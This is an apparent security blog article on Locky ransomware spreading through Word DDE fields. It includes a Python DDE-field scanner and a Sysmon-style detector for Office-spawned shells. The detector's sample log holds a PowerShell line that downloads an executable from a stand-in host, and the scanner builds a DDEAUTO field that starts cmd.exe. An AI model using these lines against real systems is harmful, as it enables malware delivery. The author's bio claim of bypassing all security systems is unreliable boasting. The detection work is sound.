LOCKY RANSOMWARE RETURNS USING MICROSOFT WORD DDE FUNCTIONALITY

Locky ransomware is back this October 2017, this time spreading through the Dynamic Data Exchange (DDE) functionality of Microsoft Word.

Locky first caused chaos in 2016, when it encrypted a great number of computers worldwide.

In August 2017 the ransomware returned as the Diablo6 variant, which targeted computers in the United States, followed by Austria, and was delivered through Microsoft Word documents carrying a VBS downloader script.

In September 2017 Locky emerged again with a new distribution scheme: a spam email made to look like a legitimate Dropbox notification.

This October 2017, Locky's developers have shown their persistence once more and adopted a different and more effective scheme for spreading the ransomware.

The latest Locky campaign abuses the Dynamic Data Exchange (DDE) functionality of Microsoft Word. DDE lets one application keep data in sync with another: a value in a cell of an Excel workbook can be linked into a Word document so that a change to the cell updates the document automatically, and the same works in the other direction or between two Word documents. The link is stored in the document as a field. When Word updates that field it asks the named application (the DDE server) for the data, and if that application is not running, Word offers to start it.

DDE is enabled by default once Microsoft Office is installed. Locky's developers abuse its automatic update of linked data by naming a command interpreter as the DDE server: the document's field makes Word start cmd.exe with arguments that fetch the ransomware from their server and run it on the target system.
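Because the DDE link is just a field code inside the document's XML, a malicious document can be identified before anyone opens it. The following scanner is an added example written for this article, not code from the article's author or from any Locky sample: it unpacks a .docx, joins each field's instruction text across the runs Word splits it into (droppers split the word DDEAUTO over several runs to defeat naive greps), and flags instructions that begin with DDE or DDEAUTO. The sample document it builds in memory is constructed for the example, contains only the document.xml part the scanner reads, and launches calc.exe in place of a real downloader command.

```python
"""Scan a .docx for DDE/DDEAUTO field codes.

Added example, not code from the original article. It builds a constructed
sample document in memory (only the word/document.xml part the scanner reads,
so it is not a complete Word file) and runs offline.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# A field whose instruction starts with DDE or DDEAUTO names an external
# application as the DDE server; DDEAUTO updates (and so launches it) on open.
DDE_RE = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)


def field_codes(part_xml: bytes):
    """Yield the full instruction text of every field in one document part.

    Word stores a complex field as a fldChar 'begin', one or more instrText
    runs, an optional 'separate' plus cached result, and a fldChar 'end'.
    Droppers split the instruction across many runs, so the pieces are joined
    before matching; a stack handles fields nested inside other fields.
    """
    root = ET.fromstring(part_xml)
    stack = []
    for el in root.iter():  # document order
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                yield "".join(stack.pop())
        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")
        elif el.tag == W + "fldSimple":  # single-element field form
            yield el.get(W + "instr", "")


def list_fields(docx_bytes: bytes) -> list:
    """Return every field instruction in every word/*.xml part of a .docx
    (the body, headers, footers and footnotes can all carry fields)."""
    codes = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                codes.extend(field_codes(zf.read(name)))
    return codes


def find_dde_fields(docx_bytes: bytes) -> list:
    """Return only the DDE/DDEAUTO instructions, whitespace trimmed."""
    return [c.strip() for c in list_fields(docx_bytes) if DDE_RE.match(c)]


def build_sample_docx() -> bytes:
    """Constructed sample: one benign DATE field and one DDEAUTO field whose
    instruction is split over three runs. calc.exe stands in for the real
    downloader command; the doubled backslashes are the DDE field syntax."""
    document_xml = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="{ns}"><w:body>
<w:p>
 <w:r><w:fldChar w:fldCharType="begin"/></w:r>
 <w:r><w:instrText xml:space="preserve"> DATE \\@ "M/d/yyyy" </w:instrText></w:r>
 <w:r><w:fldChar w:fldCharType="separate"/></w:r>
 <w:r><w:t>10/20/2017</w:t></w:r>
 <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p>
<w:p>
 <w:r><w:fldChar w:fldCharType="begin"/></w:r>
 <w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>
 <w:r><w:instrText xml:space="preserve">AUTO c:\\\\windows\\\\system32\\\\cmd.exe </w:instrText></w:r>
 <w:r><w:instrText xml:space="preserve">"/k calc.exe" </w:instrText></w:r>
 <w:r><w:fldChar w:fldCharType="separate"/></w:r>
 <w:r><w:t>Loading...</w:t></w:r>
 <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p>
</w:body></w:document>""".format(ns=W_NS)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for code in find_dde_fields(build_sample_docx()):
        print("DDE field:", code)
```

Run it against real mail attachments by passing the file bytes to find_dde_fields; a DDE field in a document that has no business linking to other applications is reason enough to quarantine it, whatever the payload after the executable path says.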

DDE has existed since 1987. Despite repeated warnings from security firms urging Microsoft to stop shipping DDE in its programs, it is still present today, including in the most widely used software such as Microsoft Office.

The attack begins when the Word document is opened. Word processes the DDE field and shows a notification asking for permission to update fields that refer to other files. If the user approves, a second notification asks whether to start cmd.exe. Once both prompts are confirmed, the ransomware is downloaded and executed. Declining either prompt stops the chain, so a document that unexpectedly asks to update linked data, and then to start a program, should be closed rather than approved.

The following are images of the notifications from MS Word:

 

This DDE technique needs neither macros nor a memory-corruption bug, so disabling macros does not prevent it and there is no memory-safety flaw for exploit mitigations to catch; the two user prompts are the only barrier.
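Since the chain above always ends with Word starting a command interpreter, it leaves a clear trace in process-creation telemetry: an Office application as the parent of cmd.exe or a similar interpreter. The detection below is an added example, not code from the article or from any vendor product. It parses events shaped like the text of Sysmon Event ID 1 (the field names Image, ParentImage and CommandLine are the real ones; every value, path and URL in the sample log is constructed) and flags Office-to-shell launches while ignoring normal Office child processes such as the print helper.

```python
"""Flag shells spawned by Office applications in process-creation telemetry.

Added example, not code from the original article. The events are
constructed to resemble the text of Sysmon Event ID 1 (field names Image,
ParentImage and CommandLine are the real ones; every value is invented).
"""
import re
from pathlib import PureWindowsPath

# Office hosts that a DDE field can make launch a program, and the
# interpreters an attacker names as the "DDE server" to get code execution.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                  "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# Constructed sample: one DDE-style launch, one user-started cmd.exe, and one
# benign Word child (the printing helper). example.invalid is a reserved name.
SAMPLE_LOG = r"""
Image: C:\Windows\System32\cmd.exe
CommandLine: C:\Windows\System32\cmd.exe /k powershell -NoP -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x','%TEMP%\x.exe')"
ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Image: C:\Windows\System32\cmd.exe
CommandLine: "C:\Windows\System32\cmd.exe"
ParentImage: C:\Windows\explorer.exe

Image: C:\Windows\splwow64.exe
CommandLine: C:\Windows\splwow64.exe 12288
ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
"""

FIELD_RE = re.compile(r"^(\w+):\s*(.*)$")


def parse_events(log_text: str) -> list:
    """Split the log on blank lines and turn each event into a field dict."""
    events = []
    for block in re.split(r"\n\s*\n", log_text.strip()):
        fields = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line.strip())
            if m:
                fields[m.group(1)] = m.group(2).strip()
        if fields:
            events.append(fields)
    return events


def exe_name(path: str) -> str:
    """Lower-cased file name of a Windows path, surrounding quotes stripped."""
    return PureWindowsPath(path.strip('"')).name.lower()


def is_office_spawned_shell(event: dict) -> bool:
    """True when an Office process is the direct parent of an interpreter."""
    return (exe_name(event.get("ParentImage", "")) in OFFICE_PARENTS
            and exe_name(event.get("Image", "")) in SHELL_CHILDREN)


def find_alerts(log_text: str) -> list:
    """Return (parent, child, command line) for every suspicious launch."""
    return [(exe_name(e["ParentImage"]), exe_name(e["Image"]),
             e.get("CommandLine", ""))
            for e in parse_events(log_text) if is_office_spawned_shell(e)]


if __name__ == "__main__":
    for parent, child, cmdline in find_alerts(SAMPLE_LOG):
        print(f"ALERT {parent} -> {child}: {cmdline}")
```

The rule keys on process lineage rather than on the downloader's command line, which changes from campaign to campaign; the captured command line is kept in the alert so the responder can see what the shell was told to fetch.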

The following is a screenshot of an infected computer by Locky Ransomware:

 

 

Manny Cuevas

My name is Manny Cuevas, a Security Researcher / Engineer for about 15 years who focuses on Web and Mobile applications and other platforms, from the island of Sulu, Philippines. I'm also a scientist, inventor and a top-ranked hacker in the world who bypasses all security systems.

 
